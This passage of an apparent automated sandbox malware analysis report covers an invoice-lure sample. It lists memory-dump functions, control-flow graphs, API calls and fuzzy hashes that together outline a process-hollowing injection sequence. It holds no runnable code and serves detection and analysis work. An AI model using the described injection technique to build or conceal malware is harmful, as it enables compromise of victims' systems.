                                  • Source File: 00000000.00000002.1689604915.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d60000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: d0524f09041bfe0d4c16029269e36cc318a310fb3f901e07c6e1f208ceacd394
                                  • Instruction ID: 3dc05885fc6ce8a7f4777b8747a7f363cd9769697298f0ca2a093261ca5e3a30
                                  • Opcode Fuzzy Hash: d0524f09041bfe0d4c16029269e36cc318a310fb3f901e07c6e1f208ceacd394
                                  • Instruction Fuzzy Hash: 9B5178B0D003098FDB14DFA9D948B9EBBF2EF49314F248459E409A7350DB78A944CF65
                                  Function 070E4B33 Relevance: 1.7, APIs: 1, Instructions: 244processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 358 70e4b33-70e4bcd 360 70e4bcf-70e4bd9 358->360 361 70e4c06-70e4c26 358->361 360->361 362 70e4bdb-70e4bdd 360->362 368 70e4c5f-70e4c8e 361->368 369 70e4c28-70e4c32 361->369 363 70e4bdf-70e4be9 362->363 364 70e4c00-70e4c03 362->364 366 70e4bed-70e4bfc 363->366 367 70e4beb 363->367 364->361 366->366 370 70e4bfe 366->370 367->366 375 70e4cc7-70e4d81 CreateProcessA 368->375 376 70e4c90-70e4c9a 368->376 369->368 371 70e4c34-70e4c36 369->371 370->364 373 70e4c38-70e4c42 371->373 374 70e4c59-70e4c5c 371->374 377 70e4c46-70e4c55 373->377 378 70e4c44 373->378 374->368 389 70e4d8a-70e4e10 375->389 390 70e4d83-70e4d89 375->390 376->375 379 70e4c9c-70e4c9e 376->379 377->377 380 70e4c57 377->380 378->377 381 70e4ca0-70e4caa 379->381 382 70e4cc1-70e4cc4 379->382 380->374 384 70e4cae-70e4cbd 381->384 385 70e4cac 381->385 382->375 384->384 386 70e4cbf 384->386 385->384 386->382 400 70e4e12-70e4e16 389->400 401 70e4e20-70e4e24 389->401 390->389 400->401 402 70e4e18 400->402 403 70e4e26-70e4e2a 401->403 404 70e4e34-70e4e38 401->404 402->401 403->404 407 70e4e2c 403->407 405 70e4e3a-70e4e3e 404->405 406 70e4e48-70e4e4c 404->406 405->406 408 70e4e40 405->408 409 70e4e5e-70e4e65 406->409 410 70e4e4e-70e4e54 406->410 407->404 408->406 411 70e4e7c 409->411 412 70e4e67-70e4e76 409->412 410->409 414 70e4e7d 411->414 412->411 414->414
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070E4D6E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 0c72676209d25015e044bb71f798691a46d0c8a19db01b064b72c874c4f5b254
                                  • Instruction ID: 8d43d8ddab4f3be600253f60e67df52dc6479a6e3ef0d91f9c5198ff0f85813a
                                  • Opcode Fuzzy Hash: 0c72676209d25015e044bb71f798691a46d0c8a19db01b064b72c874c4f5b254
                                  • Instruction Fuzzy Hash: 5E9169B1D0025ACFDB54CF68C8417EDBBF6BF48314F1486A9E819A7280DB749985CF92
                                  Function 070E4B38 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 415 70e4b38-70e4bcd 417 70e4bcf-70e4bd9 415->417 418 70e4c06-70e4c26 415->418 417->418 419 70e4bdb-70e4bdd 417->419 425 70e4c5f-70e4c8e 418->425 426 70e4c28-70e4c32 418->426 420 70e4bdf-70e4be9 419->420 421 70e4c00-70e4c03 419->421 423 70e4bed-70e4bfc 420->423 424 70e4beb 420->424 421->418 423->423 427 70e4bfe 423->427 424->423 432 70e4cc7-70e4d81 CreateProcessA 425->432 433 70e4c90-70e4c9a 425->433 426->425 428 70e4c34-70e4c36 426->428 427->421 430 70e4c38-70e4c42 428->430 431 70e4c59-70e4c5c 428->431 434 70e4c46-70e4c55 430->434 435 70e4c44 430->435 431->425 446 70e4d8a-70e4e10 432->446 447 70e4d83-70e4d89 432->447 433->432 436 70e4c9c-70e4c9e 433->436 434->434 437 70e4c57 434->437 435->434 438 70e4ca0-70e4caa 436->438 439 70e4cc1-70e4cc4 436->439 437->431 441 70e4cae-70e4cbd 438->441 442 70e4cac 438->442 439->432 441->441 443 70e4cbf 441->443 442->441 443->439 457 70e4e12-70e4e16 446->457 458 70e4e20-70e4e24 446->458 447->446 457->458 459 70e4e18 457->459 460 70e4e26-70e4e2a 458->460 461 70e4e34-70e4e38 458->461 459->458 460->461 464 70e4e2c 460->464 462 70e4e3a-70e4e3e 461->462 463 70e4e48-70e4e4c 461->463 462->463 465 70e4e40 462->465 466 70e4e5e-70e4e65 463->466 467 70e4e4e-70e4e54 463->467 464->461 465->463 468 70e4e7c 466->468 469 70e4e67-70e4e76 466->469 467->466 471 70e4e7d 468->471 469->468 471->471
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070E4D6E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 4a57593aedf952f59a3b909688655d74781a85f7908ca9659676bd8f3c2003cd
                                  • Instruction ID: cf56e693821ac99bdabb806597a596f6fff7c19450f225986bbce61a01b4da5b
                                  • Opcode Fuzzy Hash: 4a57593aedf952f59a3b909688655d74781a85f7908ca9659676bd8f3c2003cd
                                  • Instruction Fuzzy Hash: C1916AB1D0025ACFDB54CF68C8417EDBBF6BF48314F048269E819A7280DB749985CF92
                                  Function 00D6ADA8 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 472 d6ada8-d6adb7 473 d6ade3-d6ade7 472->473 474 d6adb9-d6adc6 call d6a0cc 472->474 475 d6adfb-d6ae3c 473->475 476 d6ade9-d6adf3 473->476 479 d6addc 474->479 480 d6adc8 474->480 483 d6ae3e-d6ae46 475->483 484 d6ae49-d6ae57 475->484 476->475 479->473 527 d6adce call d6b040 480->527 528 d6adce call d6b030 480->528 483->484 486 d6ae7b-d6ae7d 484->486 487 d6ae59-d6ae5e 484->487 485 d6add4-d6add6 485->479 490 d6af18-d6afd8 485->490 491 d6ae80-d6ae87 486->491 488 d6ae60-d6ae67 call d6a0d8 487->488 489 d6ae69 487->489 495 d6ae6b-d6ae79 488->495 489->495 522 d6afe0-d6b00b GetModuleHandleW 490->522 523 d6afda-d6afdd 490->523 493 d6ae94-d6ae9b 491->493 494 d6ae89-d6ae91 491->494 497 d6ae9d-d6aea5 493->497 498 d6aea8-d6aeaa call d6a0e8 493->498 494->493 495->491 497->498 501 d6aeaf-d6aeb1 498->501 503 d6aeb3-d6aebb 501->503 504 d6aebe-d6aec3 501->504 503->504 506 d6aec5-d6aecc 504->506 507 d6aee1-d6aeee 504->507 506->507 508 d6aece-d6aede call d6a0f8 call d6a108 506->508 513 d6aef0-d6af0e 507->513 514 d6af11-d6af17 507->514 508->507 513->514 524 d6b014-d6b028 522->524 525 d6b00d-d6b013 522->525 523->522 525->524 527->485 528->485
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00D6AFFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1689604915.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d60000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 03533f34220b5948e75432a445bdcd110eb7141b87d202e787b21397c077d172
                                  • Instruction ID: 0e6ffc54326e6172009760ffda9b99375af51d67ce435e22e6483327ef46bf1b
                                  • Opcode Fuzzy Hash: 03533f34220b5948e75432a445bdcd110eb7141b87d202e787b21397c077d172
                                  • Instruction Fuzzy Hash: 577124B0A00B058FD724DF29D44575ABBF1FF88304F04892AE48AE7A41D775E949CFA2
                                  Function 00D644B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 637 d644b4-d659d9 CreateActCtxA 640 d659e2-d65a3c 637->640 641 d659db-d659e1 637->641 648 d65a3e-d65a41 640->648 649 d65a4b-d65a4f 640->649 641->640 648->649 650 d65a60 649->650 651 d65a51-d65a5d 649->651 653 d65a61 650->653 651->650 653->653
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00D659C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1689604915.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d60000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 93575bf558ebe972832c765392fa3d9fc1a7984ea35820a047b66b532c0c0cb1
                                  • Instruction ID: a9832ea9c33fcd54e5cfe48c44f35eb2ac88b81ad439a880ca3d250375158ead
                                  • Opcode Fuzzy Hash: 93575bf558ebe972832c765392fa3d9fc1a7984ea35820a047b66b532c0c0cb1
                                  • Instruction Fuzzy Hash: C041E3B0C0071DCBDB24DFA9C844B9DBBF5BF48304F24815AD509AB255DB75698ACF90
                                  Function 00D6590C Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 654 d6590c-d65913 655 d6591c-d659d9 CreateActCtxA 654->655 657 d659e2-d65a3c 655->657 658 d659db-d659e1 655->658 665 d65a3e-d65a41 657->665 666 d65a4b-d65a4f 657->666 658->657 665->666 667 d65a60 666->667 668 d65a51-d65a5d 666->668 670 d65a61 667->670 668->667 670->670
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00D659C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1689604915.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d60000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 91b968eb7d06a186ec7a2e7988763cf168fe97cba54886cdcd7d05866e7fdcb2
                                  • Instruction ID: 9775d428820d49eb0c1afc7043f35b3bf49d4b3b8f96a3caf605cd2cfef81356
                                  • Opcode Fuzzy Hash: 91b968eb7d06a186ec7a2e7988763cf168fe97cba54886cdcd7d05866e7fdcb2
                                  • Instruction Fuzzy Hash: 2141DFB0C0071ACBDB24DFA9C8847CDBBB1BF48304F24816AD519AB255DB75698ACF90
                                  Function 070E48AB Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 671 70e48ab-70e48fe 673 70e490e-70e494d WriteProcessMemory 671->673 674 70e4900-70e490c 671->674 676 70e494f-70e4955 673->676 677 70e4956-70e4986 673->677 674->673 676->677
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070E4940
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 7503b1977b7ad74a27d4eb5b9f04f66c7867b92b0ab7370e73ef4d6e11459bd7
                                  • Instruction ID: ee9f2580a398d7f4ff86f318bdd89f3e22d045f46bc6d7600833c3519cd67905
                                  • Opcode Fuzzy Hash: 7503b1977b7ad74a27d4eb5b9f04f66c7867b92b0ab7370e73ef4d6e11459bd7
                                  • Instruction Fuzzy Hash: 072166B59003499FCF10CFA9C884BEEBBF5FF88310F10842AE959A7240C7789954CBA4
                                  Function 070E48B0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 681 70e48b0-70e48fe 683 70e490e-70e494d WriteProcessMemory 681->683 684 70e4900-70e490c 681->684 686 70e494f-70e4955 683->686 687 70e4956-70e4986 683->687 684->683 686->687
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070E4940
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: bbaaf370ed529f4d9fbe9ae6c597b618ad31425568c013d60a98b6ed9bb426d6
                                  • Instruction ID: e1e948c983aaad2b7f894d1468a7c1a4ef552eb4f6117f82250a7a1d9e219337
                                  • Opcode Fuzzy Hash: bbaaf370ed529f4d9fbe9ae6c597b618ad31425568c013d60a98b6ed9bb426d6
                                  • Instruction Fuzzy Hash: E72139B19003599FCF10DFA9C885BDEBBF5FF88310F108429E959A7240C7789954CBA4
                                  Function 070E4998 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 691 70e4998-70e4a2d ReadProcessMemory 695 70e4a2f-70e4a35 691->695 696 70e4a36-70e4a66 691->696 695->696
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070E4A20
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: e59eecb84c0c33c805820132ac70ff36cc194406d248a87f4f5b46fb8a8f5e64
                                  • Instruction ID: 087596de4424b3173b13dfa9e0647e4fb6a3587041612b6bd5c202666f256fa7
                                  • Opcode Fuzzy Hash: e59eecb84c0c33c805820132ac70ff36cc194406d248a87f4f5b46fb8a8f5e64
                                  • Instruction Fuzzy Hash: 3D2148B1800359DFCB10DFAAC880ADEFBF5FF48320F10842AE519A7240D7389945DBA4
                                  Function 070E4713 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 700 70e4713-70e4763 702 70e4765-70e4771 700->702 703 70e4773-70e47a3 Wow64SetThreadContext 700->703 702->703 705 70e47ac-70e47dc 703->705 706 70e47a5-70e47ab 703->706 706->705
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070E4796
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: adb07fcce38d8401d28c381505bf0dbdfbc63a12a0ed47b8d1269d712afb2a7c
                                  • Instruction ID: 8f34396f7fdce0e9d1983477200c72943ea776257affff16c940e7b6708703e3
                                  • Opcode Fuzzy Hash: adb07fcce38d8401d28c381505bf0dbdfbc63a12a0ed47b8d1269d712afb2a7c
                                  • Instruction Fuzzy Hash: 2D2137B19003098FDB14DFAAC4857EEBBF4EF89324F10842AE559A7240CB789945CFA5
                                  Function 070E4718 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 710 70e4718-70e4763 712 70e4765-70e4771 710->712 713 70e4773-70e47a3 Wow64SetThreadContext 710->713 712->713 715 70e47ac-70e47dc 713->715 716 70e47a5-70e47ab 713->716 716->715
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070E4796
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 86be32dcc65a449811b15ff685f1225803c5f8cfcf0b926f91d469dd2359e5cb
                                  • Instruction ID: 901bff603ac86e7babc6dc13bc33b8156216a041b8790e163616141debc53512
                                  • Opcode Fuzzy Hash: 86be32dcc65a449811b15ff685f1225803c5f8cfcf0b926f91d469dd2359e5cb
                                  • Instruction Fuzzy Hash: 882149B1D003098FDB10DFAAC4857EEBBF4EF89324F10842AE559A7241CB789945CFA5
                                  Function 070E49A0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070E4A20
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: ae8fc9e1b296c2d154fcb24b6f177bdd0247de04b7c79e667cea47984f9bb1f5
                                  • Instruction ID: 3214d539df8becac83f33cdec4ae31cbd322d84676a7a4c396af7c8e5dbcf590
                                  • Opcode Fuzzy Hash: ae8fc9e1b296c2d154fcb24b6f177bdd0247de04b7c79e667cea47984f9bb1f5
                                  • Instruction Fuzzy Hash: 442139B1C003499FCB10DFAAC845ADEFBF5FF48320F108429E519A7240D7789944DBA5
                                  Function 00D6D690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D6D717
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1689604915.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d60000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: de80ca95e8a960353541e0cd17f01f1b87427aabb118fe2a4339c75207d4fe70
                                  • Instruction ID: fe02195fb561428a5b3d13b25b0fd396781386d79ad054824e8fb2ae23871200
                                  • Opcode Fuzzy Hash: de80ca95e8a960353541e0cd17f01f1b87427aabb118fe2a4339c75207d4fe70
                                  • Instruction Fuzzy Hash: 6921E4B5D002489FDB10CF9AD984ADEBBF5EB48310F14801AE918A3350C378A954CFA5
                                  Function 070E47E8 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070E485E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 9f40ee2860b77d6576a7f2d02d5d64fceeef4ddfa0e091d40dc51229b597612f
                                  • Instruction ID: a1870dc259d557fa976e135928ccfc56b7645fb745517ab0fac8de95353b6d10
                                  • Opcode Fuzzy Hash: 9f40ee2860b77d6576a7f2d02d5d64fceeef4ddfa0e091d40dc51229b597612f
                                  • Instruction Fuzzy Hash: AC1167B59002898FDB10DFAAC844BEFBFF5EF88324F24841AE519A7250C7359940DFA1
                                  Function 070E47F0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070E485E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: e68a964213fd862a97bb1afed85ec415932d6422eb181d9354e6072a842318d1
                                  • Instruction ID: 63cee5b802a28f76ac7f199536d76830e804ccc71d6c8c862056846a01e4d806
                                  • Opcode Fuzzy Hash: e68a964213fd862a97bb1afed85ec415932d6422eb181d9354e6072a842318d1
                                  • Instruction Fuzzy Hash: 0C1137B19002499FCB10DFAAC845ADFBFF5EF88324F208419E519A7250C775A954CFA5
                                  Function 070E4228 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: c5eb69a41f124339a678d334c531b572c6ddee9fdb7500249fb067a320284d49
                                  • Instruction ID: 3683b9d43b5fe8afb20ca2083ccb692cfffdafdfc8bd3b6b0281b5f77a0db137
                                  • Opcode Fuzzy Hash: c5eb69a41f124339a678d334c531b572c6ddee9fdb7500249fb067a320284d49
                                  • Instruction Fuzzy Hash: 7E1119B5D003498FDB10DFAAC4457DEFBF5AB88324F108419D919A7240CA79A945CB95
                                  Function 070E4230 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: a81ace1e8ef853972ee4612cee72e0a23532b016601446a1830c0e186cb5e1f5
                                  • Instruction ID: 8fc875729670e5b7b09a9ec6df24a4456d274e36e205135775e9dc5f5fe0423b
                                  • Opcode Fuzzy Hash: a81ace1e8ef853972ee4612cee72e0a23532b016601446a1830c0e186cb5e1f5
                                  • Instruction Fuzzy Hash: E91125B1D003498FDB10DFAAC44579EFBF9EB88324F208819D519A7240CA79A944CBA5
                                  Function 070E3158 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 070E6EF5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 58b272a5c8538913e442c5ecebf3f1af1df63a98f0cba13dca084b898156aeae
                                  • Instruction ID: 43cc6cd82119d0cd8267a1d14f162c03da14ed4f424077c184e6e7adf7768989
                                  • Opcode Fuzzy Hash: 58b272a5c8538913e442c5ecebf3f1af1df63a98f0cba13dca084b898156aeae
                                  • Instruction Fuzzy Hash: 4D11F2B58003499FDB10DF9AD849BDEBBF8EB58324F108459E918A7350C376A944CFA5
                                  Function 00D6AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00D6AFFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1689604915.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_d60000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 97e8dd98109915ba6222dc1ed324b7ef6aba4b23668d20af0dd7623acd6fd72e
                                  • Instruction ID: 4a1bc393d0638342dd21b079727395b11c3683a8f58be141ebe087352ad6b1c6
                                  • Opcode Fuzzy Hash: 97e8dd98109915ba6222dc1ed324b7ef6aba4b23668d20af0dd7623acd6fd72e
                                  • Instruction Fuzzy Hash: 80110FB5C003498FCB10DF9AC444A9EFBF4AB88324F14841AD429A7210C379A545CFA1
                                  Function 070E6E93 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 070E6EF5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1693766598.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 29a18857ecd6a87c6cd2bceb4ae7f308c2f268c3cb3490e4434dca90d52de70e
                                  • Instruction ID: ffddfe2e04f025e73e99f9dfb666975d3863858be49c423d88b8387b0554cf14
                                  • Opcode Fuzzy Hash: 29a18857ecd6a87c6cd2bceb4ae7f308c2f268c3cb3490e4434dca90d52de70e
                                  • Instruction Fuzzy Hash: A611F2B58002499FCB10DF99D544BDEBBF8EB48314F10841AE518A7640C379A544CFA1
                                  Function 008BD01C Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1688425022.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8bd000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 10b3e6a9ba83a03b50e08e5d70ad983ccd720572d241ca53f045b40e9f0f4a48
                                  • Instruction ID: 1b795e071aba4efbf713fe749ea3499e220c15925c2993b9a8401a4331205603
                                  • Opcode Fuzzy Hash: 10b3e6a9ba83a03b50e08e5d70ad983ccd720572d241ca53f045b40e9f0f4a48
                                  • Instruction Fuzzy Hash: 2521F275604704EFCB14EF14D9C4B66BBA5FB98324F24C96DD80A8B386D33AD807CA61
                                  Function 008BD1D4 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1688425022.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8bd000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4c47d214d78234b52e3c0eb5bddf1f6fe6d797dac503d927ab049b26e42edf3c
                                  • Instruction ID: efb02f4ddccd23ead641100d7def1e6d4f7b0b56defd31d17efac3412627be80
                                  • Opcode Fuzzy Hash: 4c47d214d78234b52e3c0eb5bddf1f6fe6d797dac503d927ab049b26e42edf3c
                                  • Instruction Fuzzy Hash: 2521F575604344EFDB05DF14D9C4B65BBA5FB94318F24C66DD80A8B392D336E806CB61
                                  Function 008BD006 Relevance: .1, Instructions: 63COMMON
